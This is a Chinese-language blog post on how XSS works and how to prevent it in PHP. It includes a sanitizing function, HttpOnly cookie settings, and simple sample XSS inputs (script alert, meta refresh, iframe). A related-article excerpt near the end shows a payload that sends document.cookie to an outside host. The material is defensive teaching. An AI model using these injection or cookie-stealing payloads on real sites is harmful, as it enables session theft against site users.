PHP如何防止XSS攻击与XSS攻击原理

最新推荐文章于 2024-07-05 07:29:37 发布
最新推荐文章于 2024-07-05 07:29:37 发布
阅读量1.3k 收藏 4
点赞数 2
分类专栏: PHP
原文链接:https://mp.weixin.qq.com/s/jRuchaDBHpXxkjZh31F5vA
版权

转载至:https://mp.weixin.qq.com/s/jRuchaDBHpXxkjZh31F5vA  

XSS又称CSS,全称Cross SiteScript(跨站脚本攻击), XSS攻击类似于SQL注入攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie信息、破坏页面结构、重定向到其它网站等。

理论上,只要存在能提供输入的表单并且没做安全过滤或过滤不彻底,都有可能存在XSS漏洞。

 

下面是一些最简单并且比较常见的恶意字符XSS输入:

1.XSS 输入通常包含 JavaScript 脚本,如弹出恶意警告框:<script>alert("XSS");</script>

2.XSS 输入也可能是 HTML 代码段,譬如:

  • (1).网页不停地刷新 <meta http-equiv="refresh" content="0;">

  • (2).嵌入其它网站的链接 <iframe src=http://xxxx width=250 height=250></iframe>

除了通过正常途径输入XSS攻击字符外,还可以绕过JavaScript校验,通过修改请求达到XSS攻击的目的,如下图:

 

 

了解到XSS攻击的原理和危害后,其实要预防也不难,下面提供一个简单的PHP防止XSS攻击的函数:

<?PHP
/**
 * @param $string
 * @param $low 安全别级低
 */
function clean_xss(&$string, $low = False)
{
 if (! is_array ( $string ))
 {
 $string = trim ( $string );
 $string = strip_tags ( $string );
 $string = htmlspecialchars ( $string );
 if ($low)
 {
  return True;
 }
 $string = str_replace ( array ('"', "\\", "'", "/", "..", "../", "./", "//" ), '', $string );
 $no = '/%0[0-8bcef]/';
 $string = preg_replace ( $no, '', $string );
 $no = '/%1[0-9a-f]/';
 $string = preg_replace ( $no, '', $string );
 $no = '/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S';
 $string = preg_replace ( $no, '', $string );
 return True;
 }
 $keys = array_keys ( $string );
 foreach ( $keys as $key )
 {
 clean_xss ( $string [$key] );
 }
}
//just a test
$str = 'codetc.com<meta http-equiv="refresh" content="0;">';
clean_xss($str); //如果你把这个注释掉,你就知道xss攻击的厉害了
echo $str;
?>

 

PHP中的设置

PHP5.2以上版本已支持HttpOnly参数的设置,同样也支持全局的HttpOnly的设置,在php.ini中

-----------------------------------------------------
session.cookie_httponly = 
-----------------------------------------------------

 

设置其值为1或者TRUE,来开启全局的Cookie的HttpOnly属性,当然也支持在代码中来开启:

<?php 
ini_set("session.cookie_httponly", 1);  
// or session_set_cookie_params(0, NULL, NULL, NULL, TRUE);  
?>

 

Cookie操作函数setcookie函数和setrawcookie函数也专门添加了第7个参数来做为HttpOnly的选项,开启方法为:

<?php 
setcookie("abc", "test", NULL, NULL, NULL, NULL, TRUE);  
setrawcookie("abc", "test", NULL, NULL, NULL, NULL, TRUE); 
?>
vue 如何防止xss攻击 框架_前端防范xss攻击的实用方案
weixin_39848970的博客
12-22 5405
一、xss攻击原理大家想必都听过xss攻击,那么这个xss到底是如何攻击、我们又应该如何防范的呢?xss攻击主要是针对表单的input文本框发起的,比如有这样一个文本框:xss攻击图1在说明一栏填入一段js代码,如果前端不进行过滤直接提交到后端(比如php),而php端也没有进行过滤直接入库,那么在下一个展示页面,就会发生这样的情况:xss攻击图2为什么会酱紫呢?因为我们在说明这一栏的input,...
php_XSS防攻击插件
05-29
php编辑器或者文本域获取js传值 js写入防止被攻击XSS;有demo使用手册
php 避免xss_php如何防范xss
weixin_39611037的博客
03-09 161
XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。php防范xss的方法有在输出html时,加上Content Security Policy的Http Header;在设置Cookie时,加上Htt...
PHP如何防范XSS攻击
最新发布
A150922923282的博客
07-05 317
如果按照这个逻辑来看的话,PHP在防范XSS攻击方面采取了多种措施,包括输入验证与过滤、输出编码、使用HTTP响应头、更新与修补以及使用安全框架和库等。XSS攻击,即跨站脚本攻击,是指攻击者通过向Web页面注入恶意脚本,当其他用户浏览该页面时,恶意脚本会在用户的浏览器中执行,从而达到窃取用户信息、篡改页面内容等目的。验证用户输入的类型、长度、格式等,确保输入的内容符合预期的规范。如果我们将目光投向这方面的话,使用PHP内置的函数或正则表达式对用户输入中的特殊字符进行过滤,防止恶意脚本的注入。
php 避免xss_PHP防止XSS注入
weixin_30682635的博客
03-09 406
我们在做网站的时候,经常有input提交,通常前端对input中的内容不做判断,只做不为空等简单的操作。但是,有的input中会提交一些javascript或者html,会给网站造成一定的危害。为此,防止XSS注入的任务交给了后端,后端防止XSS注入函数如下:function RemoveXSS($val) {// remove all non-printable characters. CR(0...
PHP防止xss攻击
yang_ldgd的博客
08-16 605
phpxss攻击
如何在 PHP防止 XSS
allway2的博客
07-24 2173
要解决此问题,您需要将htmlspecialchars()与所需参数一起使用,如果您在URL中使用用户数据,则将其与urlencode()函数结合使用。实际上,您可能会注意到,在Codeigniter部分中,我没有讨论属性问题,我已经在其他框架中讨论过。这三种类型的最大区别在于,在存储的XSS中,用户数据保存在数据库中,这与反射和基于DOM的XSS漏洞相反。现在,当我问我的大多数客户和学生,这个漏洞的影响是什么时,他们不断地告诉我,比如窃取用户信息、控制应用程序等等,仅此而已。...
PHP如何防止XSS攻击XSS攻击原理的讲解
10-17
XSS攻击原理涉及Web应用程序如何处理用户输入的问题。在不经过适当过滤的情况下,用户输入的数据可能会被当作代码执行。比如,当一个Web表单用于收集用户信息,并将这些信息显示在页面上,如果开发者没有对这些信息...
PHP常用工具函数小结【移除XSS攻击、UTF8与GBK编码转换等】
10-17
本文将主要介绍PHP中用于移除XSS攻击的函数,以及进行UTF-8与GBK编码转换的方法。 首先,我们来探讨PHP中的函数用于移除XSS攻击。这类函数通常能够识别并清除输入字符串中潜在的恶意代码,保障Web应用的安全性。从...
PHP如何防止XSS攻击
qq_37913859的博客
07-07 472
PHP防止XSS跨站脚本攻击的方法:是针对非法的HTML代码包括单双引号等,使用htmlspecialchars()函数 。 在使用htmlspecialchars()函数的时候注意第二个参数, 直接用htmlspecialchars($string) 的话,第二个参数默认是ENT_COMPAT,函数默认只是转化双引号(“), 不对单引号(‘)做转义. 所以,htmlspecialchars函数更多的时候要加上第二个参数, 应该这样用: htmlspecialchars(string,ENTQUOTES).
PHP 安全:如何防止PHP中的XSS
新华编程特战队
04-24 1184
跨站点脚本(XSS) 是一种严重的安全漏洞,允许恶意行为者将恶意脚本引入网站,使毫无戒心的访问者处于危险之中。使用 XSS,攻击者可以在受害者的 Web 浏览器中执行任意代码,可能导致敏感数据被盗、未经授权的访问或网站污损。本文旨在深入探讨 XSS 攻击的主要形式,阐明其根本原因,探索 XSS 利用的潜在后果,并深入了解防止 PHPXSS 攻击的有效措施。当恶意行为者成功将有害脚本插入受信任的网站时,就会发生跨站脚本(XSS) 攻击。这些受感染的网站在不知不觉中将注入的脚本提供给毫无戒心的用户。
xss php 转义_整理php防注入和XSS攻击通用过滤
weixin_39963523的博客
03-09 437
对网站发动XSS攻击的方式有很多种,仅仅使用php的一些内置过滤函数是对付不了的,即使你将filter_var,mysql_real_escape_string,htmlentities,htmlspecialchars,strip_tags这些函数都使用上了也不一定能保证绝对的安全。那么如何预防 XSS 注入?主要还是需要在用户数据过滤方面得考虑周全,在这里不完全总结下几个 Tips1. 假定所...
php如何防止xss攻击
weixin_54963682的博客
03-11 676
php如何防止xss攻击 php防止xss跨站脚本攻击的方法,是针对非法的html代码包括单双引号,使用htmlspecialchar()函数。 在使用htmlspecialchar()的时候注意第二个参数,直接用htmlspecialchar($string)的话,第二个参数默认是ENT_COMPAT,函数只是转义双引号,不转义单引号。 所以使用htmlspecialchar函数时尽量加上第二个参数,htmlspecialchar(string,ENTQUOTES)转化单引号和双引号,如果不需要编译任何的
PHP "完美"的防XSS 防SQL注入的代码
libo_sina的专栏
06-21 978
function gjj($str) {     $farr = array(         "/\\s+/",         "/]*?)>/isU",         "/(]*)on[a-zA-Z]+\s*=([^>]*>)/isU",     );     $str = preg_replace($farr,"",$str);     return addslashes
php防止xss攻击
u013695932的博客
05-09 306
<?PHP function clean_xss(&$string, $low = False) { if (!is_array($string)) { $string = trim($string); $string = strip_tags($string); $string = htmlspecialchars($string); if ($low) { return True; ...
PHP 防止xss攻击
infinite
01-20 524
一、什么是xss攻击?   XSS攻击全称跨站脚本攻击,是为不合层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。    XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中...
PHP防御XSS攻击
Lisam Blog
12-15 2454
XSS即跨站脚本工具 例如我在你的评论上写了 alert('楼主傻逼'); 然后很有可能就会弹出楼主傻逼了,当然这只是恶作剧,但要是别人在你的获取cookie就很严重了,如下 document.location="http://www.test.com/a.php?b="+document.cookie; 通过这种方式,你的所有cookie就会被发送到对应的网站去
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值